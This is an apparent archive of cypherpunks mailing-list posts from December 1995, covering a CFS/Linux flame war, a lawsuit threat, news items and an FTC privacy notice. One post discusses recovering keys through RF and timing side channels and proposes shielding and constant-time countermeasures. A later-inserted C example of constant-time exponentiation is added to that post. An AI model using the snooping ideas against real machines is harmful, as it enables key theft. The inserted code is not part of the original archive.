>costs around 60 $ a month. Telephone costs are 3.7 $ per hour. If you 
>take into account that wages of around 350 $ per month are 
>considered normal it is clear why internet is not used by so many people
>in Poland. 
>And now NASK announced that too many people are using the 
>internet and that they need more money to keep the lines open. 
>They decided that from January they would raise the prices, 
>and that they would calculate costs per bytes sent or received. 
>Yes that's right, we have to pay for letters you send us and we 
>have to pay for WWW pages you download from us. This will mean 
>the end of most internet activity in Poland. 
>If you want to know the details you can find them at: 
>http://galaxy.uci.agh.edu.pl/~szymon/protest-eng.html
>http://www.put.poznan.pl/hypertext/isoc-pl/battle.html
>protest@uci.agh.edu.pl
>
>That's why we Marta Dubrzynska, Webmaster of the Centre for 
>Contemporary Art in Warsaw, (http://sunsite.icm.edu.pl/culture/csw/) and 
>Michiel van der Haagen, Net user (http://www.atm.com.pl/COM/michiel/) ask 
>your help.
>Can you make it clear to our Government and NASK that this policy is
>disastrous for Polish culture, economy and education? Please check out 
>these WWW addresses and react.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@wero.cs.byu.edu>
Date: Sun, 24 Dec 1995 16:04:38 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
In-Reply-To: <199512240544.VAA05521@jobe.shell.portal.com>
Message-ID: <199512240748.AAA13767@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Sorry for being one of those who responds to Detweiler's troll...

> So the master is at last fallen.  Kudos to Mr. Jim Choate and Dr.
> Dimitri Vulis for having the courage of their convictions to help
> unmask AT&T's deceit in claiming to support Linux and free software
> when, in truth, it is doing just the opposite.

Patting yourself on the back again eh? I didn't know people as stupid
as you knew how to use email. CFS is Matt Blaze's toy. A toy. When ATT
starts charging money for CFS, then all your bitching and moaning
about ATT _might_ make sense.

Oh, by the way, since when did att "claim" to support linux?

> Linux isn't perfect, but its open environment is a good start for
> building REAL secure software.  Don't let AT&T's lies bully you
> into abandoning it!  CFS will never run under Linux until it is

Oh brother,  now I know for sure that this is a spoof. Nobody could
be this lame for reals...

Don

- -- 
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *






-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMN0F4cLa+QKZS485AQFjFwL+Pk6s59bAATKkSgoH4eGrdcDQ1gwA0Nog
Lih8rbkWD7RIf3g2g7xiaPnEI+HQBCWvSHkdeybZ8CPLC/E40ONHeA06+l+J6jDK
PpAskeZxu8aUKlyXDl3seIb3Xmguy+Mz
=3Kr4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 24 Dec 1995 15:14:46 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Fred Cohen: Re: CFS and Linux
In-Reply-To: <199512231823.NAA07160@jekyll.piermont.com>
Message-ID: <Pine.BSF.3.91.951224012906.19267A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Dec 1995, Perry E. Metzger wrote:
> > Fred Cohen writes to me in private:
...
> 
> Let's see.  I guess I would start by having the police confiscate the
> toad.com computers because they are part of a criminal conspiracy to
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
I didn't realize that AI research was that far along.  Can someone point 
me to the specs for the computer that can become a "part of a criminal 
conspiracy"??

EBD


> damage my reputation.  Criminal because of the recent changes in the
> law that prohibit you from sending me information I don't want to get.
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 24 Dec 1995 15:17:15 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Fred Cohen: Re: CFS and Linux
In-Reply-To: <199512231845.NAA07203@jekyll.piermont.com>
Message-ID: <Pine.BSF.3.91.951224013240.19267B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Dec 1995, Perry E. Metzger wrote:

> > Fred Cohen writes:
> > > The dollar value would be $1 plus a public apology plus all costs of the
> > > suit plus my time to right the wrong (at my usual fee of course).  Of
> > > course the fact that you have decided to make this posting in public
> > > justifies my extensive efforts to clear my reputation which, unless you
> > > apologize immediately will be surprisingly enjoyable for me.
> > 
> > Go and sue, Fred. Its what I have lawyers for. If you can even find an
> > attorney willing to take your "case", mine will likely remind yours
> > that lawyers can now be punished by the court in many jurisdictions
> > for knowingly aiding in bringing frivolous suits. If you are seeking
> > $1 in damages the court is especially likely to consider the whole
> > thing a waste of time.
> 
> Your choice, but it's not a very nice Christmas present to find yourself
> in litigation.  I'll give you till Tuesday to reconsider.  If I see the
> public apology, I won't call the lawyers.
> 
> If I were you, I would talk to those lawyers of yours and get their
> opinion of whether it's worth your while to be malicious toward people
> in this way in exchange for defending against a law suit when all you
> have to do to prevent it is apologize for what you now know to be a
> falsehood.


How, exactly, does Perry (or anyone else here) "know" it to be a 
falsehood.  Fred denies it.  If I was posting anonymously and was accused 
of being the anonymous poster, I'd deny it too.

Oh, I forgot, someone posting as one of the "Alices" denied it too.  That 
makes it conclusive. 

This anonymity thing is easier than I thought.

EBD

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 24 Dec 1995 17:44:54 +0800
To: attila <attila@primenet.com>
Subject: Re: Fred Cohen: Re: CFS and Linux
In-Reply-To: <Pine.BSD.3.91.951224080819.26471A-100000@usr3.primenet.com>
Message-ID: <Pine.BSF.3.91.951224042445.20498A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Dec 1995, attila wrote:

> On Sun, 24 Dec 1995, Brian Davis wrote:
> 
> > On Sat, 23 Dec 1995, Perry E. Metzger wrote:
> > > > Fred Cohen writes to me in private:
> > ...
> > > 
> > > Let's see.  I guess I would start by having the police confiscate the
> > > toad.com computers because they are part of a criminal conspiracy to
> > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > I didn't realize that AI research was that far along.  Can someone point 
> > me to the specs for the computer that can become a "part of a criminal 
> > conspiracy"??
> > 
> > EBD
> > 
> > 
> > > damage my reputation.  Criminal because of the recent changes in the
> > > law that prohibit you from sending me information I don't want to get.
> > > 
> >
> 	the basis of the seizure is for evidence collection.  then they
>     take their sweet time scrounging the disks for evidence.  If no
>     evidence is found, they give it back --eventually.  I saw one case go 
>     by a couple years back where they were trying to make the computer an
>     accessory to the crime (I dunno, maybe it was supposed to auto-dial
>     and drop the dime --no that's in 18USC as failure to snitch!)

Much truth here, but not relevant to Dr. Fred's threat of a civil suit.  
He can't have his attorneys just call the FBI to pick up toad's computer.

CoS's seizure of computers, while shameful, was based on a different 
legal theory than the good Dr. can possibly allege. 


EBD


> 	of course, if there are drugs involved, they confiscate it as
>     spoils of the criminal act and the equipment is impounded and
>     eventually sold after conviction for the benefit of their slush funds. 
> 
> 	I would imagine you have seen plenty of the latter one in the
>     Federal attorney's office. this also gets into the issues of private
>     cryptography and that _everybody_ should give up privacy protection,
>     first amendment rights, etc. so uncle can catch a few dopers, gun 
>     runners, and other assorted malcreants [sic] --like the difference 
>     between {mis,mal}feasance: in both cases you get fucked, but 'mal' is
>     intentional... 
> 
>  
> > Not a lawyer on the Net, although I play one in real life.
> >
>     hey, at least you admit you're having a good time!
> 
> > **********************************************************
> > Flame away! I get treated worse in person every day!!
> > 
>     
> 
> --
> --------------------------------------------------------------------
> #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
> $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
> 2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
> pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)
> 
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sun, 24 Dec 1995 21:42:51 +0800
To: cypherpunks@toad.com
Subject: To Youall
Message-ID: <9512241324.AA23587@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


                       ^
                    _:(O):_
                  <<<<<+>>>>>
                     }}:{{
                  '^'^'^'^'^'
                ~~d^~q~V~p~^b~~
            ^ |[pg/M\pgvgp/M\gp]| ^
          g/M\pgp/M.M\pgp/M.M\pgp/M\p
        /M/:\M\V/M/:\M\V/M/:\M\V/M/:\M\
   ~==|\M/&:&\MVM/&:&\MVM/&:&\MVM/&:&\M/|==~
  *{$$$MeRrYxmaS$TocpunKs@eVeryWheRE.CoM$$$}*
   ~==|\/M\:/M\V/M\:/M\V/M\:/M\V/M\:/M\/|==~
      '{\O[o%[anDtimMIe&eLDee,to0]&o]O/}'
       ^/.\:^.^W^.^:^.^W^.^:^.^W^.^:/\.^        
           {p\qVp^q:p^qVp^q:p^qVp/q}      
             o=o\==o===O===o==/o=o
                x..X\..X../X..x
                 (dbdb\W/dbdb)
                   )'\\%//'(
                     '***'
                      &:&
                       :
                       .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 24 Dec 1995 04:29:29 +0800
To: perry@piermont.com
Subject: Re: CFS and Linux (fwd)
In-Reply-To: <199512231640.LAA07020@jekyll.piermont.com>
Message-ID: <199512231941.GAA00983@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 
> 
> Jim Choate writes:
> > 
> > > First of all, this is Matt Blaze's pet project, not a product of
> > > AT&T. It is given away for free and you should be happy to get it at
> > > all -- no one is obligated to give you a gift. Have you mailed him a
> > > Linux machine to do his testing on? Why do you assume he even has one?
> > > As it happens, he doesn't, and probably doesn't want to go through the
> > > hassle of paying for a computer and putting Linux on it.
> > > 
> > > Be happy he's given you anything at all.
> > 
> > If you are going to do it, do it right the first time.
> > 
> > Second, I really doubt Blaze has a problem obtaining access to computing
> > power and a $25 CD should be within his budget.

I am annoyed. Matt Blaze has no obligation to produce CFS for free, let
alone a version for dummies. And boy, are you a dummy. As someone who
has hacked away at CFS for a long time now on several platforms,
including linux, I can state that the issues of porting CFS to linux
were trivial and involved a one line sed on the rpcgen output. The more
recent versions of linux don't even require this.  Further, Matt is
hardly the government/corporate lackey that you suggest him to be. Why
don't you read some of his papers before you show your technical and
social ignorance? Get a life.

-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  has stood still, who built the largest |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 24 Dec 1995 23:10:19 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
In-Reply-To: <199512240748.AAA13767@wero.cs.byu.edu>
Message-ID: <1T7LgD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Don M. Kitchen" <don@wero.cs.byu.edu> writes:
> Sorry for being one of those who responds to Detweiler's troll...

I wonder which of the participants are Lance...

> > So the master is at last fallen.  Kudos to Mr. Jim Choate and Dr.
> > Dimitri Vulis for having the courage of their convictions to help
> > unmask AT&T's deceit in claiming to support Linux and free software
> > when, in truth, it is doing just the opposite.

There's been a bit of confusion here. Perry Metzger stated that Matt Blaze
doesn't have Linux and shouldn't support it. Naturally, this got a few Linux
fans (like myself) overly emotional. Matt Blaze later said that he does have
Linux (contrary to what Perry said), that CFS installs fine, under his version,
and that he's been unable to duplicate the problem reported here (but will
include a fix in future distributions if someone supplies it). It's a perfectly
reasonable position. In particular, this is a much more reasonable position
than the anal-retentive one most MS Windows freeware authors take when you ask
them about running their programs under WinOS2. I told Matt what I thought of
this in private e-mail. _I_ don't have a problem with Matt Blaze.

My conjecture is that during this long holiday weekend certain contributors
are taking recreational drugs before posting to the mailing list.

> Patting yourself on the back again eh? I didn't know people as stupid
> as you knew how to use email.

That's what's wrong with the net in general. 10+ years ago, when I started
using it, it was hard to use e-mail and Usenet, so most of the people using it
had to be fairly intelligent. Today, no intelligence is required to use e-mail,
or even a cpunks anonymous remailer. I wish crypto software and mail filtering
software followed suit and became as easy to use and transparent as the
rest of our comm software.

I've been communicating with one sci.crypt personality, who configured his
procmail to accept e-mail only from a list of people he knows. To be able to
send him e-mail, I had to contact him by other means and ask him to add my name
to the list of approved correspondents. :) He's not checking digital
signatures, just the from lines. (By the way, he's not on cypherpunks because
he considers the level of crypto expertise here to be too low.)

Is this where we're heading?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jimbell)
Date: Sun, 24 Dec 1995 16:58:04 +0800
To: cypherpunks@toad.com
Subject: Spread-Spectrum computer clock?
Message-ID: <m0tTlLJ-00091XC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Recently there has been a substantial amount of discussion concerning the use of
accurate timing in an attempt to uncover encryption keys, by carefully noting
the length of time that a decryption takes in a computer of a known cpu speed.
I have noticed that most of the discussion focussed on the delay time of the
overall operation done over a network, for example a LAN or perhaps the
Internet, but it has been recognized that imprecision due to indeterminate
network timings make such a tactic problematic at least.

However, being a ham and occasionally listening to the various odd noises
produced by a computer when you tune a VHF or UHF ham radio to a harmonic of the
clock speed, it occurred to me that the delay times WITHIN a particular
encryption/decryption would be far more easily measured with local RF snooping.
I would imagine that if you can determine even a fraction of a bit of key from a
network "ping,"  you could do a lot better "listening" to the execution of a
program within a few hundred feet with an ordinary radio receiver and a
sophisticated analysis program.

Okay, I admit, this is certainly not a new idea.  The military's TEMPEST program
is to build electronic equipment which is so "quiet" that it is impossible (or,
at least, arbitrarily difficult) to capture useful information by inadvertent
radio transmission.

Obviously, that is out of the league (not to mention the budget) of the vast
majority of the users of personal computers.  Nevertheless, it seems to me that
if we as a community of computer users are interested in security, we should not
merely focus on the mathematics and algorithms used and their reliability, but
also secondary methods to break the systems involved.

True, most of us are not sufficiently interesting "targets" to justify this kind
of attack, but machines such as encrypted remailers are sufficiently "high
value" that protecting them would be worth a little extra effort.  I'm not under
any illusion that we can hope to make them "snoop-proof", but a little effort
should substantially raise the difficulty level.

More than a year ago, it occurred to me that it might be worth it to build a CPU
clock replacement module that took the place of the main CPU crystal oscillator,
and replaced it with an oscillator module whose frequency was (very long period!)
pseudorandomly varied, possibly with a resolution of 16-bit and over a range of
perhaps 1%, with the frequency varying every few tens or hundreds of
microseconds.  The result, I presume, is that every operation synchronized to
the microprocessor clock  would vary in time and would be hard to "tune" with a
normal radio receiver.  It seems to me that this would make the resulting
computer harder to "bug" using standard equipment.

If this were do-able and were in fact done, it would probably be worth it to
"tailor" the spectrum of variation in clock speed so that these variations do
not tend to average out over "long" times, for example a few hundred
milliseconds or even tens of seconds.   This would at least help to disguise the
decryption-time information that is commonly discussed.   

A complicating factor is the fact that modern motherboards often generate their
microprocessor clocks using PLL synthesis from a master clock, probably the
14.318 MHz clock.  On the one hand, that might make the process easier; only one
clock to vary.  On the other, it is at least conceivable that there are some
devices in any given computer which depend on a precisely constant clock speed,
and would not tolerate such variation.  This was probably more true in the early
days of the IBM PC; today you usually see separate crystals on any cards that
need truly specific frequencies.



(Hey, I didn't say this was a perfect solution, merely one that would raise the
barrier a bit...)


Other potential tactics.  (Some of which are already happening; if anybody out
there is more informed about such techniques, please tell me)

0.   Copper-screen cages.  Okay, maybe this appears to be a bit too obvious, but
it really isn't too involved:  A few years ago, I happened onto a roll of
honest-to-goodness copper screen; sort of like window screen but made of pure
copper.  Sewn/soldered into a bag, it would make an excellent cover.  (openings
required for floppies and CDROMS, as well as cables are obviously a
complication, but...)

1.  Use CPUs with internal caches as well as external caches, both to reduce the
amount of electronic noise transmitted to antenna-length wires outside the
microprocessors, as well as make external memory accesses less predictable and
less frequent.  Fortunately, I suppose, the natural transition to 486's (DX2's
and DX4/4s) and Pentiums has made this happen without any anti-snooping
motivation.

2.  Eventually, CRT's will be replaced with some sort of matrix-type displays
that emit far less useable information and will be easier to shield.

3.  Filtering of every wire that comes out of the computer's case, primarily
using a combination of ferrite beads and decoupling capacitors.   This would be
especially true of the telephone line, which would be accessible from outside a
house or office.   Also, use of multiple powerline filters/surge protectors in
series.

4.  I'd pay particular attention to the keyboard interface and its associated
microcontroller:  Years ago, I speculated that if a VFO (voltage to frequency
converter) was placed on the data line between the  keyboard and the computer,
it would transmit the identity of every key pressed.  (This would obviously
include passwords, too)  

(Does the keyboard hardware of the typical PC allow echobacks, which would allow
the CPU to fill the CPU/Keyboard channel with apparently meaningless random
garbage, thwarting RF overhearing of this data?!?)


And I wouldn't be surprised if the NSA has built replacement keyboard
controllers to be used to surreptitiously replace on garden-variety keyboards,
controllers which deliberately "broadcast" such information in an even
easier-to-discern pattern. Even a short access to such a keyboard and it might
be telling your  secrets.  

Even if a black-bag job wasn't possible, if it were possible to tune to its
normal keyboard microprocessor operation rate, and given a known keyboard scan
pattern a particular pressed key could be identified.  Given how cheap keyboards
are these days, a slightly paranoid person might buy one from a trustworthy
source and glue the case  shut to prevent tampering, and replace it monthly with
cast-offs.

5.    While this isn't my area of expertise, it occurs to me that software
should be written to complete operations in an identical time frame, no matter
the input data.  While this has already been hashed over on the nets, the
"solution" that is typically discussed involves adding a null loop at the end of
the real operation, and continuing only after the "wall clock" shows enough time
has passed.  This isn't an adequate solution, I think, if local RF monitoring of
the computer can be done.  (It will know when the actual result ended)    A
better (and, sadly, more inefficient) method would involve executing BOTH
branches of a conditional jump, and only using the data generated from the
desired half at the very end.

Another possibility might be (for certain large mathematical algorithms) is to
split up the functions and to execute them in a "random" order, with enough
"dummy" operations inserted to further disguise the  facts.  For example, if
you're multiplying two 1024-bit values to get a 2048-bit result, program this to
be done in a pseudorandom order and intersperse any operations with pseudorandom
operations  to disguise it.  (A pseudorandom interrupt generator might help,
here.)

6.   Think like an NSA hack.  If I were such a sneaky bastard, I'd try to figure
out a way to modulate a visible LED on the computer's case with data, or modulate
the video display's brightness to signal slow-speed data..  



Well, that's just a few thoughts.  There's a lot more material out there that
ought to be discussed.  Admittedly, these subjects can appear to be a bit more
than a little paranoid, but without such discussion we're almost certain to be
at risk.
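
Item 5 of the message above argues for executing both branches of a conditional and keeping only the wanted result at the end. The following C code is an added example, not part of the original post: it applies that idea to square-and-multiply modular exponentiation, next to the ordinary branching version. The function names, the multiplication counter and the test modulus are assumptions made for the illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* Counts modular multiplications. It stands in for what an outside
 * observer (timing, RF, power) could learn about the work performed. */
static unsigned long mul_count;

/* (a * b) mod m. Requires a, b < m < 2^32 so the product fits in 64 bits. */
static uint64_t mulmod(uint64_t a, uint64_t b, uint64_t m)
{
    mul_count++;
    return (a * b) % m;
}

/* Return a when bit == 1 and b when bit == 0, without a conditional jump. */
static uint64_t select_no_branch(uint64_t bit, uint64_t a, uint64_t b)
{
    uint64_t mask = (uint64_t)0 - (bit & 1);   /* all ones or all zeros */
    return (a & mask) | (b & ~mask);
}

/* Ordinary square-and-multiply: the extra multiplication happens only
 * for exponent bits that are 1, so the amount of work depends on the
 * secret exponent. */
uint64_t modexp_branchy(uint64_t base, uint64_t exp, uint64_t m)
{
    uint64_t result = 1 % m;
    base %= m;
    for (int i = 63; i >= 0; i--) {
        result = mulmod(result, result, m);
        if ((exp >> i) & 1)
            result = mulmod(result, base, m);
    }
    return result;
}

/* "Both branches" version: every iteration computes the squared value
 * and the squared-and-multiplied value, then keeps one of them with a
 * mask. The sequence of operations is the same for every exponent.
 * Caveats: a compiler may still turn the mask into a branch, and the
 * hardware divide behind % can take operand-dependent time on some
 * CPUs, so the generated code has to be inspected on the target. */
uint64_t modexp_both_branches(uint64_t base, uint64_t exp, uint64_t m)
{
    uint64_t result = 1 % m;
    base %= m;
    for (int i = 63; i >= 0; i--) {
        uint64_t bit = (exp >> i) & 1;
        uint64_t squared = mulmod(result, result, m);
        uint64_t multiplied = mulmod(squared, base, m);  /* always computed */
        result = select_no_branch(bit, multiplied, squared);
    }
    return result;
}

/* Number of modular multiplications f performs for a given exponent.
 * Base 3 and modulus 1000003 are constructed sample values. */
unsigned long count_muls(uint64_t (*f)(uint64_t, uint64_t, uint64_t),
                         uint64_t exp)
{
    mul_count = 0;
    (void)f(3, exp, 1000003);
    return mul_count;
}

int main(void)
{
    printf("4^13 mod 497: branchy=%llu both=%llu\n",
           (unsigned long long)modexp_branchy(4, 13, 497),
           (unsigned long long)modexp_both_branches(4, 13, 497));
    printf("multiplications, exp=1:        branchy=%lu both=%lu\n",
           count_muls(modexp_branchy, 1),
           count_muls(modexp_both_branches, 1));
    printf("multiplications, exp=all ones: branchy=%lu both=%lu\n",
           count_muls(modexp_branchy, UINT64_MAX),
           count_muls(modexp_both_branches, UINT64_MAX));
    return 0;
}
```

The branching version's multiplication count tracks the number of 1 bits in the exponent, while the both-branches version performs the same count for every exponent.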





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Mon, 25 Dec 1995 01:05:34 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: CFS and Linux
In-Reply-To: <1T7LgD3w165w@bwalk.dm.com>
Message-ID: <199512241606.IAA04460@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain



 
> That's what's wrong with the net in general. 10+ years ago, when I started
> using it, it was hard to use e-mail and Usenet, so most of the people using it
>had to be fairly intelligent. Today, no intelligence is required to use e-mail,
> or even a cpunks anonymous remailer. I wish crypto software and mail filtering
> software followed the suit and became as easy to use and transparent at the
> rest of our comm software.

Long for the good old days of bang-paths, 300 baud acoustic couplers
and UUCP maps?  see http://www.lne.com/lemay/writings/curmudgeonnet.html

> I've been communicating with one sci.crypt personality, who configured his
> procmail to accept e-mail only from a list of people he knows. To be able to
>send him e-mail, I had to contact him by other means and ask him to add my name
> to the list of approved correspondents. :) He's not checking digital
> signatures, just the from lines. (By the way, he's not on cypherpunks because
> he considers the level of crypto expertise here to be too low.)
> 
> Is this where we're heading?

Close.

Where we're headed is mail filters with PGP imbedded (PGP 3 will
make this much easier) that check incoming mail for a valid signature
for certain PGP keyid/fingerprints and pass that mail along.
Other mail that doesn't match gets tossed into a 'junk' folder
or thrown away if you really don't want to talk to anyone that you
don't already know.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 24 Dec 1995 16:58:08 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Fred Cohen: Re: CFS and Linux
In-Reply-To: <Pine.BSF.3.91.951224012906.19267A-100000@mercury.thepoint.net>
Message-ID: <Pine.BSD.3.91.951224080819.26471A-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 24 Dec 1995, Brian Davis wrote:

> On Sat, 23 Dec 1995, Perry E. Metzger wrote:
> > > Fred Cohen writes to me in private:
> ...
> > 
> > Let's see.  I guess I would start by having the police confiscate the
> > toad.com computers because they are part of a criminal conspiracy to
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> I didn't realize that AI research was that far along.  Can someone point 
> me to the specs for the computer that can become a "part of a criminal 
> conspiracy"??
> 
> EBD
> 
> 
> > damage my reputation.  Criminal because of the recent changes in the
> > law that prohibit you from sending me information I don't want to get.
> > 
>
	the basis of the seizure is for evidence collection.  then they
    take their sweet time scrounging the disks for evidence.  If no
    evidence is found, they give it back --eventually.  I saw one case go 
    by a couple years back where they were trying to make the computer an
    accessory to the crime (I dunno, maybe it was supposed to auto-dial
    and drop the dime --no that's in 18USC as failure to snitch!)

	of course, if there are drugs involved, they confiscate it as
    spoils of the criminal act and the equipment is impounded and
    eventually sold after conviction for the benefit of their slush funds. 

	I would imagine you have seen plenty of the latter one in the
    Federal attorney's office. this also gets into the issues of private
    cryptography and that _everybody_ should give up privacy protection,
    first amendment rights, etc. so uncle can catch a few dopers, gun 
    runners, and other assorted malcreants [sic] --like the difference 
    between {mis,mal}feasance: in both cases you get fucked, but 'mal' is
    intentional... 

 
> Not a lawyer on the Net, although I play one in real life.
>
    hey, at least you admit you're having a good time!

> **********************************************************
> Flame away! I get treated worse in person every day!!
> 
    

--
--------------------------------------------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length$n&~1)/2)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Dec 1995 00:34:26 +0800
To: cypherpunks@toad.com
Subject: TAX_zip
Message-ID: <199512241540.KAA04264@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-24-95. NYPaper:

   "Money Laundering, New and Improved. To really hide loot,
   wait for the arrival of 'cybercash.' "

      The days when you could trust a Swiss banker to hold on
      to your millions and keep his mouth shut are long gone.
      Embarrassing disclosure incidents are forcing any money
      launderer worth his pocket change to go high-tech, using
      the wonder of home-banking computer programs to zip
      money across borders. What American authorities fear the
      most, however, is the rise of "cybercash."

      "The nightmare of it is that there is no registration of
      every transaction, the way there is if you use a Visa or
      Mastercard," said Stanley E. Morris, who heads the
      financial crimes enforcement network.

   TAX_zip  (7k)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Dec 1995 00:38:29 +0800
To: cypherpunks@toad.com
Subject: KID_zoo
Message-ID: <199512241541.KAA04332@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-24-95. NYPaper:

   "Case Involving Free Speech And the Internet Is Settled."

      A dispute about free speech on the Internet has been
      settled out of Court here after a local school district
      admitted that a high school principal had wrongly
      reprimanded a student for lampooning his school on the
      World Wide Web. The school district apologized to Mr.
      Paul Kim for the punitive actions. "We now know our own
      boundaries," said Ann Oxrieder, the school district's
      spokeswoman. "The Internet is unexplored territory for
      schools and we now know that when a student uses his own
      equipment and on his own time, we should stay out of
      it."

   KID_zoo  (6k)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Dec 1995 00:51:34 +0800
To: cypherpunks@toad.com
Subject: RAT_357
Message-ID: <199512241548.KAA04638@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The NYPaper of 12-23 and 12-24-95 report on the arrest
   Wednesday and "suicide" yesterday of Thomas Lewis Lavy, who
   was jailed under anti-terrorism statutes for trying to
   import from Canada to Alaska 130 grams of the deadly poison
   ricin -- enough to "kill thousands of people," officials
   said. Some 40 F.B.I. agents and Army chemical warfare
   specialists mounted the assault in deadly "survivalist,
   fundamentalist" Arkansas, right deadly Ollie North's 
   recreational-poison/gun swap fly-in.

      Lavy's attorney, Sam Heuer, took sharp issue with the
      government's accusations. "It is such a tragic case,"
      Mr. Heuer said. "An overzealous U.S. Attorney in Alaska
      and a hot dog F.B.I. agent tried to paint Tom as
      something he was not. Tom was a very gentle, very kindly
      person. We have the right to have rat poison or coyote
      poison, just like we have the right to have a .357
      Magnum."


   RAT_357  (12k)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 25 Dec 1995 01:03:18 +0800
To: cypherpunks@toad.com
Subject: FTC Privacy Initiative
Message-ID: <Pine.BSD.3.91.951224110122.19209A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
You may wish to inform yourself about the FTC Privacy Initiative:
 
 The US Federal Trade Commission has launched a "Privacy Initiative"
 to investigate whether the information collected at websites
 (either that affirmatively submitted by a visitor via a form or
 information collected based upon a visitor's selection of pages
 at a site to reflect personal interests) should be the subject
 of regulation by the FTC.
 
 To get background on this effort, you may want to read a speech 
 by FTC Commissioner Varney on Electronic Commerce and Privacy 
 which is available at the FTC's site under speeches 
 
                     http://www.ftc.gov 

 or [at] the Advertising Law Internet Site 
 
             http://www.webcom.com/~lewrose/home.html
 
 under speeches. 
 
 This week the staff of the FTC established a mailing list to 
 allow interested parties to discuss the issues surrounding the 
 privacy interests of consumers visiting web sites.  To subscribe, 
 send the message 
 
                        subscribe 

 to 
 
                  privacy-request@ftc.gov 
 
 
